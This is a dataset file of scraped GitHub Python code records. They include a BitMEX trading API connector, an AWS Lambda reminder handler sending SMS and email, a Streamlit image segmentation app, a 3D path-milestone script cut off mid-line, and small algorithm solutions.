Series, default=None, column name containing prefix values for the UIDs\n :param gzd: boolean, default=True, whether the Grid Zone Designation should be included in the UIDs\n :param k100: boolean, default=True, whether the 100k meter grid reference should be included in the UIDs\n :param delimiter: string, default='-', delimiter of the UIDs\n :return: list, nested list in [X, Y, UID] format\n \"\"\"\n ref_column = 'GRID_REF'\n if prefix_column:\n prefix_column = self._get_prefix_column(prefix_column)\n self._get_grid_refs(ref_column, precision)\n # Select only the relevant column from the dataframe\n grid_refs = self._data[ref_column]\n self._get_uids(grid_refs, column, prefix, prefix_column, gzd, k100, delimiter)\n return self._write_data(fname, column, uid=True)\n\n def write_utms(self, fname=None, column='UTM_COORD'):\n \"\"\"\n Gets the UTM coordinates for a set of points and writes them to the specified file,\n then returns a nested list of the coordinates and their grid reference.\n If no file name is given, returns a nested list without writing to a file.\n :param fname: string, default=None, file name for the output data\n :param column: string, default='UTM_COORD', column name for the UTM coordinates\n :return: list, nested list in [X, Y, UTM coordinate] format\n \"\"\"\n self._get_utm_coords(column)\n return self._write_data(fname, column)\n\n @staticmethod\n def _error(message):\n \"\"\"\n Prints an error message then exits the script with an exit status of 1.\n :param message: string, error message to print\n \"\"\"\n # Only import sys for errors\n import sys\n print('Error creating Grid object: {}'.format(message))\n sys.exit(1)\n","repo_name":"FREAC/PyUTM","sub_path":"pyutm/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10353,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"28138000750","text":"import unittest\nimport sys\nsys.path.append('../')\nimport send_email\n\n\nclass TestRun(unittest.TestCase):\n\n def test_send_email(self):\n result = send_email.send_message(\"test\",\"test\",\"cedzkii81@gmail.com\")\n self.assertEqual(None,result)\n\nif __name__ == '_main_':\n unittest.main()\n","repo_name":"akosicedzkii/flask_api_weee","sub_path":"app/test_cases/run_test.py","file_name":"run_test.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38252901191","text":"\"\"\"BitMEX API Connector.\"\"\"\nfrom __future__ import absolute_import\nimport requests\nfrom time import sleep\nimport json\nimport base64\nimport uuid\nimport logging\nfrom market_maker.auth import AccessTokenAuth, APIKeyAuthWithExpires\nfrom market_maker.utils import constants, errors\nfrom market_maker.ws.ws_thread import BitMEXWebsocket\n\n\n# https://www.bitmex.com/api/explorer/\nclass BitMEX(object):\n\n \"\"\"BitMEX API Connector.\"\"\"\n\n def __init__(self, base_url=None, symbol=None, login=None, password=None, otpToken=None,\n apiKey=None, apiSecret=None, orderIDPrefix='mm_bitmex_', shouldWSAuth=True):\n \"\"\"Init connector.\"\"\"\n self.logger = logging.getLogger('root')\n self.base_url = base_url\n self.symbol = symbol\n self.token = None\n # User/pass auth is no longer supported\n if (login or password or otpToken):\n raise Exception(\"User/password authentication is no longer supported via the API. Please use \" +\n \"an API key. You can generate one at https://www.bitmex.com/app/apiKeys\")\n self.apiKey = apiKey\n self.apiSecret = apiSecret\n if len(orderIDPrefix) > 13:\n raise ValueError(\"settings.ORDERID_PREFIX must be at most 13 characters long!\")\n self.orderIDPrefix = orderIDPrefix\n\n # Prepare HTTPS session\n self.session = requests.Session()\n # These headers are always sent\n self.session.headers.update({'user-agent': 'liquidbot-' + constants.VERSION})\n self.session.headers.update({'content-type': 'application/json'})\n self.session.headers.update({'accept': 'application/json'})\n\n # Create websocket for streaming data\n self.ws = BitMEXWebsocket()\n self.ws.connect(base_url, symbol, shouldAuth=shouldWSAuth)\n\n #\n # Public methods\n #\n def ticker_data(self, symbol):\n \"\"\"Get ticker data.\"\"\"\n return self.ws.get_ticker(symbol)\n\n def instrument(self, symbol):\n \"\"\"Get an instrument's details.\"\"\"\n return self.ws.get_instrument(symbol)\n\n def market_depth(self, symbol):\n \"\"\"Get market depth / orderbook.\"\"\"\n return self.ws.market_depth(symbol)\n\n def recent_trades(self, symbol):\n \"\"\"Get recent trades.\n\n Returns\n -------\n A list of dicts:\n {u'amount': 60,\n u'date': 1306775375,\n u'price': 8.7401099999999996,\n u'tid': u'93842'},\n\n \"\"\"\n return self.ws.recent_trades(symbol)\n\n #\n # Authentication required methods\n #\n def authentication_required(function):\n \"\"\"Annotation for methods that require auth.\"\"\"\n def wrapped(self, *args, **kwargs):\n if not (self.apiKey):\n msg = \"You must be authenticated to use this method\"\n raise errors.AuthenticationError(msg)\n else:\n return function(self, *args, **kwargs)\n return wrapped\n\n @authentication_required\n def funds(self):\n \"\"\"Get your current balance.\"\"\"\n return self.ws.funds()\n\n @authentication_required\n def position(self, symbol):\n \"\"\"Get your open position.\"\"\"\n return self.ws.position(symbol)\n\n @authentication_required\n def buy(self, quantity, price):\n \"\"\"Place a buy order.\n\n Returns order object. ID: orderID\n \"\"\"\n return self.place_order(quantity, price)\n\n @authentication_required\n def sell(self, quantity, price):\n \"\"\"Place a sell order.\n\n Returns order object. ID: orderID\n \"\"\"\n return self.place_order(-quantity, price)\n\n @authentication_required\n def place_order(self, quantity, price):\n \"\"\"Place an order.\"\"\"\n if price < 0:\n raise Exception(\"Price must be positive.\")\n\n endpoint = \"order\"\n # Generate a unique clOrdID with our prefix so we can identify it.\n clOrdID = self.orderIDPrefix + base64.b64encode(uuid.uuid4().bytes).decode('utf-8').rstrip('=\\n')\n postdict = {\n 'symbol': self.symbol,\n 'orderQty': quantity,\n 'price': price,\n 'clOrdID': clOrdID,\n 'execInst': 'ParticipateDoNotInitiate'\n }\n return self._curl_bitmex(api=endpoint, postdict=postdict, verb=\"POST\")\n\n @authentication_required\n def amend_bulk_orders(self, orders):\n \"\"\"Amend multiple orders.\"\"\"\n return self._curl_bitmex(api='order/bulk', postdict={'orders': orders}, verb='PUT', rethrow_errors=True)\n\n @authentication_required\n def create_bulk_orders(self, orders):\n \"\"\"Create multiple orders.\"\"\"\n for order in orders:\n order['clOrdID'] = self.orderIDPrefix + base64.b64encode(uuid.uuid4().bytes).decode('utf-8').rstrip('=\\n')\n order['symbol'] = self.symbol\n order['execInst'] = 'ParticipateDoNotInitiate'\n return self._curl_bitmex(api='order/bulk', postdict={'orders': orders}, verb='POST')\n\n @authentication_required\n def open_orders(self):\n \"\"\"Get open orders.\"\"\"\n return self.ws.open_orders(self.orderIDPrefix)\n\n @authentication_required\n def http_open_orders(self):\n \"\"\"Get open orders via HTTP. Used on close to ensure we catch them all.\"\"\"\n api = \"order\"\n orders = self._curl_bitmex(\n api=api,\n query={'filter': json.dumps({'ordStatus.isTerminated': False, 'symbol': self.symbol})},\n verb=\"GET\"\n )\n # Only return orders that start with our clOrdID prefix.\n return [o for o in orders if str(o['clOrdID']).startswith(self.orderIDPrefix)]\n\n @authentication_required\n def cancel(self, orderID):\n \"\"\"Cancel an existing order.\"\"\"\n api = \"order\"\n postdict = {\n 'orderID': orderID,\n }\n return self._curl_bitmex(api=api, postdict=postdict, verb=\"DELETE\")\n\n @authentication_required\n def withdraw(self, amount, fee, address):\n api = \"user/requestWithdrawal\"\n postdict = {\n 'amount': amount,\n 'fee': fee,\n 'currency': 'XBt',\n 'address': address\n }\n return self._curl_bitmex(api=api, postdict=postdict, verb=\"POST\")\n\n def _curl_bitmex(self, api, query=None, postdict=None, timeout=3, verb=None, rethrow_errors=False):\n \"\"\"Send a request to BitMEX Servers.\"\"\"\n # Handle URL\n url = self.base_url + api\n\n # Default to POST if data is attached, GET otherwise\n if not verb:\n verb = 'POST' if postdict else 'GET'\n\n # Auth: Use Access Token by default, API Key/Secret if provided\n auth = AccessTokenAuth(self.token)\n if self.apiKey:\n auth = APIKeyAuthWithExpires(self.apiKey, self.apiSecret)\n\n def maybe_exit(e):\n if rethrow_errors:\n raise e\n else:\n exit(1)\n\n # Make the request\n try:\n req = requests.Request(verb, url, json=postdict, auth=auth, params=query)\n prepped = self.session.prepare_request(req)\n response = self.session.send(prepped, timeout=timeout)\n # Make non-200s throw\n response.raise_for_status()\n\n except requests.exceptions.HTTPError as e:\n # 401 - Auth error. This is fatal with API keys.\n if response.status_code == 401:\n self.logger.error(\"Login information or API Key incorrect, please check and restart.\")\n self.logger.error(\"Error: \" + response.text)\n if postdict:\n self.logger.error(postdict)\n # Always exit, even if rethrow_errors, because this is fatal\n exit(1)\n return self._curl_bitmex(api, query, postdict, timeout, verb)\n\n # 404, can be thrown if order canceled does not exist.\n elif response.status_code == 404:\n if verb == 'DELETE':\n self.logger.error(\"Order not found: %s\" % postdict['orderID'])\n return\n self.logger.error(\"Unable to contact the BitMEX API (404). \" +\n \"Request: %s \\n %s\" % (url, json.dumps(postdict)))\n maybe_exit(e)\n\n # 429, ratelimit\n elif response.status_code == 429:\n self.logger.error(\"Ratelimited on current request. Sleeping, then trying again. Try fewer \" +\n \"order pairs or contact support@bitmex.com to raise your limits. \" +\n \"Request: %s \\n %s\" % (url, json.dumps(postdict)))\n sleep(1)\n return self._curl_bitmex(api, query, postdict, timeout, verb)\n\n # 503 - BitMEX temporary downtime, likely due to a deploy. Try again\n elif response.status_code == 503:\n self.logger.warning(\"Unable to contact the BitMEX API (503), retrying. \" +\n \"Request: %s \\n %s\" % (url, json.dumps(postdict)))\n sleep(1)\n return self._curl_bitmex(api, query, postdict, timeout, verb)\n\n # Duplicate clOrdID: that's fine, probably a deploy, go get the order and return it\n elif (response.status_code == 400 and\n response.json()['error'] and\n response.json()['error']['message'] == 'Duplicate clOrdID'):\n\n order = self._curl_bitmex('/order',\n query={'filter': json.dumps({'clOrdID': postdict['clOrdID']})},\n verb='GET')[0]\n if (\n order['orderQty'] != postdict['quantity'] or\n order['price'] != postdict['price'] or\n order['symbol'] != postdict['symbol']):\n raise Exception('Attempted to recover from duplicate clOrdID, but order returned from API ' +\n 'did not match POST.\\nPOST data: %s\\nReturned order: %s' % (\n json.dumps(postdict), json.dumps(order)))\n # All good\n return order\n\n # Unknown Error\n else:\n self.logger.error(\"Unhandled Error: %s: %s\" % (e, response.text))\n self.logger.error(\"Endpoint was: %s %s: %s\" % (verb, api, json.dumps(postdict)))\n maybe_exit(e)\n\n except requests.exceptions.Timeout as e:\n # Timeout, re-run this request\n self.logger.warning(\"Timed out, retrying...\")\n return self._curl_bitmex(api, query, postdict, timeout, verb)\n\n except requests.exceptions.ConnectionError as e:\n self.logger.warning(\"Unable to contact the BitMEX API (ConnectionError). Please check the URL. Retrying. \" +\n \"Request: %s \\n %s\" % (url, json.dumps(postdict)))\n sleep(1)\n return self._curl_bitmex(api, query, postdict, timeout, verb)\n\n return response.json()\n","repo_name":"Behappy123/market-maker","sub_path":"market_maker/bitmex.py","file_name":"bitmex.py","file_ext":"py","file_size_in_byte":11089,"program_lang":"python","lang":"en","doc_type":"code","stars":230,"dataset":"github-code","pt":"37"} +{"seq_id":"3553205841","text":"\n\nclass Player():\n _isPlaying = False\n\n def isPlaying(self):\n return self._isPlaying\n\n def play(self, args):\n path = args.pop('path', None)\n print(\"try to load player\")\n self.command('loadfile', path)\n print(\"player started\")\n self.isPlaying = True\n\n def togglePlayPause(self):\n tmp = self.get_property(\"pause\")\n if tmp:\n self.set_property(\"pause\", False)\n else:\n self.set_property(\"pause\", True)\n\n def seek(self, position):\n self.command(\"seek\", position, \"absolute\")\n\n\n\nif __name__ == \"__main__\":\n ply = MpvPlayer()\n print(\"start player\")\n ply.play({'path':'C:\\\\tmp\\\\ishaPi2\\\\videos\\\\a.mp4'})\n","repo_name":"thomaskhub/pi-player","sub_path":"mpv_player_wrapper.py","file_name":"mpv_player_wrapper.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30325600306","text":"import json\nimport boto3\nimport logging\nimport os\nimport time\nimport uuid\nfrom datetime import datetime, timedelta\nfrom boto3.dynamodb.conditions import Key, Attr\n#from reminder_app.api_reminder_handler import validate_field\n#import reminder_app.DecimalEncoder as DecimalEncoder\nfrom botocore.exceptions import ClientError\n#from reminder_app.date_utils import isostr_to_datetime, datetime_to_isostr\n\n#TODO PUT COMMON CODE IN LAYERS\ndef isostr_to_datetime(date_string):\n print(\"From Datestr:\",date_string)\n dtval = datetime.strptime(date_string, '%Y-%m-%dT%H:%M:%S.%f%z').replace(tzinfo=None)\n print (\"To Datetime:\",dtval)\n return dtval\n\ndef datetime_to_isostr(date):\n print(\"From Datetime:\",date)\n #FIXME - handle propertly\n dt = date.strftime('%Y-%m-%dT%H:%M:%S.%f%Z')+'Z'\n print(\"To Datestr:\",dt)\n return dt\n\ndef validate_field(data,fieldName):\n if fieldName not in data:\n logging.error(\"Validation Failed\")\n raise Exception(\"Couldn't create the reminder item - {fieldName} missing\".format(fieldName = fieldName))\n\ndef validate_notify_date_time(data):\n current_ts = datetime.utcnow()\n logging.info(\"Current ts:\",current_ts)\n print(\"Current ts:\",current_ts)\n date_ts = isostr_to_datetime(data['notify_date_time'])\n logging.info(\"Reminder ts:\",date_ts)\n print(\"Reminder ts:\",date_ts)\n if current_ts > date_ts:\n logging.error(\"Validation Failed: Reminder in the past\")\n raise Exception(\"Reminder {date_ts} in the past\".format(date_ts=date_ts))\n\n diff = (date_ts - current_ts)\n print(\"diff ts:\",diff.seconds)\n\n delay_params_list = ssm.get_parameters_by_path(Path=param_path,Recursive=False)['Parameters']\n\n logging.debug(delay_params_list)\n\n delay_params_dict = {param['Name'] : param for param in delay_params_list}\n \n min_delay_param = int(delay_params_dict[param_path+\"/min_delay_param\"]['Value'])\n max_delay_param = int(delay_params_dict[param_path+\"/max_delay_param\"]['Value'])\n\n delay_seconds = int(diff.seconds)\n if (min_delay_param > delay_seconds) or (delay_seconds > max_delay_param):\n logging.error(\"Validation Failed\")\n raise Exception(\"Reminder should be at least {min_delay_param} mins in the future and less than {max_delay_param} mins in the future\".format(min_delay_param=min_delay_param,max_delay_param=max_delay_param))\n\n\n\n\ndynamodb = boto3.resource('dynamodb', region_name='us-east-1')\nssm = boto3.client('ssm', region_name=\"us-east-1\")\nparam_path= '/{app_name}/{stage}'.format(app_name=os.environ['APP_NAME'],stage=os.environ['STAGE'])\n#SNS Client for SMS\nsns = boto3.client('sns')\n#SES Client for Emails\nses = boto3.client('ses')\nCHARSET = \"UTF-8\"\n\ntable = dynamodb.Table('{stack_name}-RemindersTable'.format(stack_name=os.environ['STACK_NAME']))\n\n# Gets triggered by step function\n# Check if reminder is still in pending state and the execution date is in the past\n# Check mode email or sms and send out email and call appropriate method\n# retry_count +=1\n# Create event to check if reminder is in acknowledged in 15 mins else mark as pending self again\n# if retry_count >= {MAX_RETRIES} mark the reminder as unacknowledged in dynamoDB\n# NOT USING CLOUD WATCH EVENTS AS \ndef execute_reminder(event, context):\n #data = json.loads(event['body'],strict=False)\n data = event\n logging.info(\"Event: \"+str(event))\n print(\"Event:>> \"+str(event))\n validate_field(data,'reminder_id')\n timestamp = int(time.time() * 1000)\n #fetch the reminder\n try:\n response = table.query(\n KeyConditionExpression=Key('reminder_id').eq(data['reminder_id'])\n )\n except ClientError as e:\n print(e.response['Error']['Message'])\n logging.info(e.response['Error']['Message'])\n else:\n item = response['Items'][0]\n logging.info(\"GetItem succeeded:\")\n print(\"GetItem succeeded:\")\n logging.info(item)\n\n #if state of reminder is not pending return to_execute as false\n if item['state'] != 'Pending':\n logging.info('Reminder:{reminderId} is not pending'.format(reminderId=data['reminder_id']))\n print('Reminder:{reminderId} is not pending'.format(reminderId=data['reminder_id']))\n return {\n 'to_execute':'false'\n }\n\n #else if retry_count > max_retry_count then mark state as Unacknowledged and return to_execute as false\n app_params_list = ssm.get_parameters_by_path(Path=param_path,Recursive=False)['Parameters']\n logging.debug(app_params_list)\n delay_params_dict = {param['Name'] : param for param in app_params_list}\n \n max_retry_count = int(delay_params_dict[param_path+\"/max_retry_count\"]['Value'])\n print(max_retry_count)\n if item['retry_count'] > max_retry_count:\n logging.info('Reminder:{reminderId} has exceeded max retry counts'.format(reminderId=data['reminder_id']))\n print('Reminder:{reminderId} has exceeded max retry counts'.format(reminderId=data['reminder_id']))\n #mark state as Unacknowledged\n result = table.update_item(\n Key={\n 'reminder_id': data['reminder_id']\n },\n UpdateExpression=\"SET state= :state, updated_at= :updated_at\",\n ExpressionAttributeValues={\n ':state' : 'Unacknowledged',\n ':updated_at':timestamp\n }\n )\n\n # return to_execute as false\n return {\n 'to_execute':'false'\n }\n\n #else if notify_date_time is in the future return with to_execute as true + reminder_id + notify_date_time\n date_ts = isostr_to_datetime(item['notify_date_time'])\n if date_ts > datetime.utcnow():\n logging.info('Reminder:{reminderId} is scheduled for the future - skipping` '.format(reminderId=data['reminder_id']))\n return {\n 'to_execute':'true',\n 'reminder_id':item['reminder_id'],\n 'notify_date_time':item['notify_date_time']\n }\n\n #else send notification based on notify_by and return (dont update state)\n if item['notify_by']['type'] == 'SMS' :\n send_sms(item)\n else:\n send_email(item)\n \n #set a check notification status point 5 mins in the future for acknowledgment\n #FIXME remove hard coding\n time_In_Future_By_5_mins = datetime_to_isostr(datetime.utcnow() + timedelta(minutes = 5))\n\n return {\n 'to_execute':'true',\n 'reminder_id':item['reminder_id'],\n 'notify_date_time':time_In_Future_By_5_mins\n }\n\ndef send_sms(item):\n #Send SMS\n response = sns.publish(PhoneNumber = item['notify_by']['phone_number'], Message=item['remind_msg'])\n logging.info(response)\n return {\n 'statusCode': 200,\n 'body': json.dumps(response)\n }\n\n\ndef send_email(item):\n #Send Email\n \n #Provide the contents of the email.\n response = ses.send_email(\n Destination={\n 'ToAddresses': [\n item['notify_by']['to_address'],\n ],\n },\n Message={\n 'Body': {\n 'Text': {\n 'Charset': CHARSET,\n 'Data': item['remind_msg'],\n },\n },\n 'Subject': {\n 'Charset': CHARSET,\n 'Data': item['remind_msg'],\n },\n },\n Source=item['notify_by']['from_address']\n )\n logging.info(response)\n return {\n 'statusCode': 200,\n 'body': json.dumps(response)\n }","repo_name":"ShailendVerma/aws-sam-reminder-app","sub_path":"reminder_app/execute_reminder_handler.py","file_name":"execute_reminder_handler.py","file_ext":"py","file_size_in_byte":7661,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"43992379174","text":"import filter\r\nimport streamlit as st\r\nimport base64\r\n\r\n\r\n\r\n\r\nst.title(\"Image Segmentation App\")\r\n\r\nimage_upload = st.file_uploader(\"Upload an image to perform image segmentation on!\", type=[\"png\", \"jpg\", \"jpeg\"])\r\nbtn_slot = st.empty() # Create empty slot for conditional button\r\n\r\nwith st.sidebar:\r\n st.title(\"How to Use\")\r\n st.text(\"1. Upload an image.\")\r\n st.text(\"2. Click the 'Apply Image Segmentation' button.\")\r\n st.text(\"3. Enjoy your segmented image!\")\r\n file_ = open(\"instructions.gif\", \"rb\")\r\n contents = file_.read()\r\n data_url = base64.b64encode(contents).decode(\"utf-8\")\r\n file_.close()\r\n\r\n st.markdown(\r\n f'\"cat',\r\n unsafe_allow_html=True,\r\n )\r\n\r\n\r\n# Display original image and segmented image only after source image upload\r\nif image_upload:\r\n col_left, col_right = st.columns(2)\r\n\r\n image = None\r\n show_segmented = False\r\n\r\n with col_left:\r\n st.subheader(\"Original image\")\r\n\r\n if image_upload is not None:\r\n image = image_upload\r\n\r\n st.image(image_upload, use_column_width=True)\r\n\r\n if btn_slot.button('Apply Image Segmentation'):\r\n show_segmented = True\r\n \r\n \r\n with col_right:\r\n st.subheader(\"Segmented Image\")\r\n\r\n if show_segmented:\r\n new_image = filter.image_segmentation(image)\r\n \r\n if new_image is not None:\r\n st.image(new_image, use_column_width=True)\r\n \r\nfooter=\"\"\"\r\n
    \r\n

    Developed by Cruz, Fernandez, Posadas, Saquilayan

    \r\n
    \r\n\"\"\"\r\nst.markdown(footer,unsafe_allow_html=True)","repo_name":"ethansaqui/image-segmentation-web-app","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2031,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"33760181458","text":"# -*- coding: utf-8 -*-\n\"\"\"\n @Time : 2020-10-12 10:29\n @Author : QDY\n @FileName: 530. 二叉搜索树的最小绝对差.py\n @Software: PyCharm\n\"\"\"\n\"\"\"\n给你一棵所有节点为非负值的二叉搜索树,请你计算树中任意两节点的差的绝对值的最小值。\n\n示例:\n\n输入:\n\n 1\n \\\n 3\n /\n 2\n\n输出:\n1\n\n解释:\n最小绝对差为 1,其中 2 和 1 的差的绝对值为 1(或者 2 和 3)。\n \n提示:\n树中至少有 2 个节点。\n\"\"\"\n\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass Solution:\n\n def getMinimumDifference(self, root: TreeNode) -> int:\n stack, cur, res, prev = [], root, float('inf'), -float('inf')\n while stack or cur:\n if cur:\n stack.append(cur)\n cur = cur.left\n else:\n cur = stack.pop()\n res = min(cur.val - prev, res)\n prev = cur.val\n cur = cur.right\n return res\n","repo_name":"QDylan/Learning-","sub_path":"Leetcode/530. 二叉搜索树的最小绝对差.py","file_name":"530. 二叉搜索树的最小绝对差.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"11619676403","text":"import sys\r\nfrom collections import deque\r\nN, K = map(int, input().split())\r\nA = [0] + [int(sys.stdin.readline()) for _ in range(N)]\r\nQ = deque()\r\nQ.append((0, 0))\r\n\r\nfor i in range(1, N + 1):\r\n if i - Q[0][1] - 1 > K:\r\n Q.popleft()\r\n \r\n dp = Q[0][0] + A[i]\r\n \r\n while len(Q) > 0 and dp <= Q[-1][0]:\r\n Q.pop()\r\n Q.append((dp, i))\r\n\r\nans = 0\r\ns = sum(A)\r\nwhile len(Q) > 0:\r\n u = Q.popleft()\r\n if u[1] >= N - K:\r\n ans = max(ans, s - u[0])\r\nprint(ans)","repo_name":"KongUm/BOJ","sub_path":"백준/Platinum/5977. Mowing the Lawn/Mowing the Lawn.py","file_name":"Mowing the Lawn.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38397378242","text":"import sys\nimport os\nimport numpy as np\nfrom mpl_toolkits.mplot3d import proj3d\nfrom matplotlib.patches import Circle\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import art3d\n\ndef rotation_matrix(v1,v2):\n \"\"\"\n Calculates the rotation matrix that changes v1 into v2.\n Borrowed from stack overflow\n \"\"\"\n v1/=np.linalg.norm(v1)\n v2/=np.linalg.norm(v2)\n\n cos_angle=np.dot(v1,v2)\n d=np.cross(v1,v2)\n sin_angle=np.linalg.norm(d)\n\n if sin_angle == 0:\n M = np.identity(3) if cos_angle>0. else -np.identity(3)\n else:\n d/=sin_angle\n\n eye = np.eye(3)\n ddt = np.outer(d, d)\n skew = np.array([[ 0 , d[2], -d[1]],\n [-d[2], 0 , d[0]],\n [ d[1], -d[0], 0 ]], dtype=np.float64)\n\n M = ddt + cos_angle * (eye - ddt) + sin_angle * skew\n\n return M\n \n\nclass ConstructMilestones3D:\n \n def __init__(self, path):\n \"\"\"\n \n \"\"\"\n self.path = path\n #self.ml_length= ml_length\n \n \n def GetVectors(self):\n \"\"\"\n Simply get vector components\n \"\"\"\n fp = self.path\n n_rows, n_cols = fp.shape[0], fp.shape[1]\n right = fp[1:n_rows]\n left = fp[0:n_rows-1]\n dr = right - left\n dr = np.vstack((dr,dr[-1])) \n \n return dr\n \n def GetAngles(self):\n \"\"\"\n Simply get angles (theta, phi -- spherical coordinate sys)\n \"\"\"\n dr = self.GetVectors()\n r = np.sqrt((dr*dr).sum(axis=1))\n angs = np.zeros(shape=(dr.shape[0],2))\n angs[:,0] = np.arccos(dr[:,2] / r)\n angs[:,1] = np.arcsin( dr[:,1] / np.sqrt(dr[:,0]*dr[:,0] + dr[:,1]*dr[:,1]))\n\n return angs\n\n \n def OptAngles(self, angles, n_iter=100, lr=0.01):\n \"\"\"\n Angles are optimized by taking average over neirest\n neihbours - 'Mean field approximation'. Vectorized version! \n \n \"\"\"\n alpha = np.pad(angles, ((1, 1),(0, 0)), 'edge')\n m = alpha.shape[0] # paded n_rows\n \n for iter in range(n_iter): \n alpha_mean = 0.5*(alpha[0:m-2] + alpha[2:m])\n dalpha = -alpha[1:m-1] + alpha_mean \n alpha[1:m-1] += lr*dalpha\n \n return alpha[1:m-1] # removed pads\n \n \n def OptVectors(self, vecs, n_iter=100, lr=0.01):\n \"\"\"\n Vectors along the path are optimized by taking average over neirest\n neihbours - 'Mean field approximation'. Vectorized version! \n This is better since angles have periodicity problem!\n \n \"\"\"\n\n vec = np.pad(vecs, ((1, 1),(0, 0)), 'edge')\n m = vec.shape[0] # paded n_rows\n \n for iter in range(n_iter): \n vec_mean = 0.5*(vec[0:m-2] + vec[2:m])\n dvec = -vec[1:m-1] + vec_mean \n vec[1:m-1] += lr*dvec\n \n #set flexible boundary\n vec[0] = vec[1] \n vec[m-1] = vec[m-2]\n \n #vec_mean = (vec[0:m-2] + vec[1:m-1] + vec[2:m] ) / 3.0\n #dvec = -vec[1:m-1] + vec_mean \n #vec[1:m-1] += lr*dvec\n\n return vec[1:m-1] # removed pads\n \n \n \n def Angles2UnitVecs(self, angles):\n \"\"\" \n \n \"\"\"\n U, V, W = np.sin(angles[:,0])*np.cos(angles[:,1]), \\\n np.sin(angles[:,0])*np.sin(angles[:,1]), \\\n np.cos(angles[:,0])\n \n return np.column_stack([U, V, W])\n \n \n def OptAngles1(self, angles, n_iter=100, lr=0.01):\n \"\"\"\n Angles are adjusted based on neirest neihbours.\n This is non-optimal fn \n \n \"\"\"\n pad = 1\n theta = np.copy(angles[0])\n phi = np.copy(angles[1])\n \n theta = np.pad(theta, (pad, pad), 'edge')\n phi = np.pad(phi, (pad, pad), 'edge')\n \n for iter in range(n_iter): \n for i in range(1, len(theta) - 1):\n thetamean = 0.5*(theta[i-1] + theta[i+1])\n phimean = 0.5*(phi[i-1] + phi[i+1])\n \n dtheta = -theta[i] + thetamean # modify\n dphi = -phi[i] + phimean\n \n theta[i] += lr*dtheta\n phi[i] += lr*dphi \n \n return theta[1:len(theta)-1], phi[1:len(phi)-1]\n \n \n\n\nclass SortFrames:\n \n def __init__(self, dat, dz):\n \"\"\"\n \n \"\"\"\n self.dat = dat\n self.dz = dz\n \n \n def SelFrames(self, ml_xyz, M, dr):\n \"\"\"\n Selects frames on a disk surface (both side) based on distances:\n dz - along disk normal\n dr - along radial direction\n \n \"\"\"\n data = np.copy(self.dat) - ml_xyz # translate\n a = np.dot(data, M) # rotate\n a = a*a; dz = self.dz*self.dz; dr = dr*dr # square \n mask = (a[:,2] <= dz) & (a[:,1] + a[:,0] <= dr)\n indxs = np.where(mask)[0]\n\n return indxs\n\n def SelCells(self, ml_xyzL, ml_xyzM, ml_xyzR, dr, Ml, Mm, Mr):\n \"\"\"\n Selects frames between two neighbouring milestone planes\n (aligned to milestone disk) and also sorts based on middle disk raduis:\n dz - along disk normal\n dr - along radial direction\n \n \"\"\"\n dataL = np.copy(self.dat) - ml_xyzL # translate left disk and dat with it\n aL = np.dot(dataL, Ml) # rotate\n \n dataM = np.copy(self.dat) - ml_xyzL \n aM = np.dot(dataM, Mm) \n \n dataR = np.copy(self.dat) - ml_xyzR # translate ...\n aR = np.dot(dataR, Mr) # rotate\n \n maskZ = (aL[:,2] >= 0.0) & (aR[:,2] < 0.0) # choose all points between plances \n maskR = aM[:,0]**2 + aM[:,1]**2 <= dr**2 # choose points within mid disk dr\n mask = maskZ * maskR # combine masks \n \n indxs = np.where(mask)[0]\n \n return indxs\n \n def SortAllPoints(self, normals, normalsMid, dr, pathP, pathMid, SortMethod='surface'):\n \"\"\"\n\n \"\"\"\n\n n_disks = normals.shape[0]\n n_cells = normalsMid.shape[0]\n z_hat = (0, 0, 1) # unit vecor along z\n datS = np.zeros((1,5)) # empty df for appending\n\n nf = self.dat.shape[0] \n CellIndx = np.ones(nf, dtype=int)*1000 # Index assigned to regions outside of the cells\n\n\n if SortMethod == 'surface':\n for i in range(n_disks):\n M = rotation_matrix(normals[i], z_hat) \n frame_ids = self.SelFrames(pathP[i], M, dr[i])\n diskID = np.ones_like(frame_ids, dtype=int)*i\n datS = np.append(datS, np.column_stack((self.dat[frame_ids], diskID, frame_ids)), axis=0)\n datS = datS[1:]\n\n elif SortMethod == 'middle':\n for i in range(n_cells):\n Ml = rotation_matrix(normals[i], z_hat) \n Mm = rotation_matrix(normalsMid[i], z_hat)\n Mr = rotation_matrix(normals[i+1], z_hat)\n frame_ids = self.SelCells(pathP[i], pathMid[i], pathP[i+1], dr[i], Ml, Mm, Mr)\n midIDs = np.ones_like(frame_ids, dtype=int)*i\n datS = np.append(datS, np.column_stack((self.dat[frame_ids], midIDs, frame_ids)), axis=0)\n CellIndx[frame_ids] = i\n\n datS = datS[1:]\n\n else:\n print('Specify one of the available methods to sort data points!')\n\n return datS, CellIndx\n\n\n\n\n \nif __name__=='__main__':\n \n from Utils import Generate3Data, Generate2Data, pathpatch_2d_to_3d\n from BKit import BuildSmoothMeanPath \n from BKit import InterpolatePath\n\n plot2D = True\n w_size = 100\n stride = 20\n n_points = 500\n dr = .8\n alpha = .5\n fs = 12 \n \n if plot2D:\n dat = Generate2Data(n_points)\n else:\n dat = Generate3Data(n_points)\n \n ReactPath = BuildSmoothMeanPath(dat, w_size=w_size, stride=stride) \n points = ReactPath.GetPath()\n \n ConsMile = ConstructMilestones3D(points)\n vecs = ConsMile.GetVectors()\n normals = ConsMile.OptVectors(vecs, n_iter=1000, lr=0.01)\n\n n_disks = normals.shape[0]\n rad = np.ones(n_disks)*dr\n \n fig = 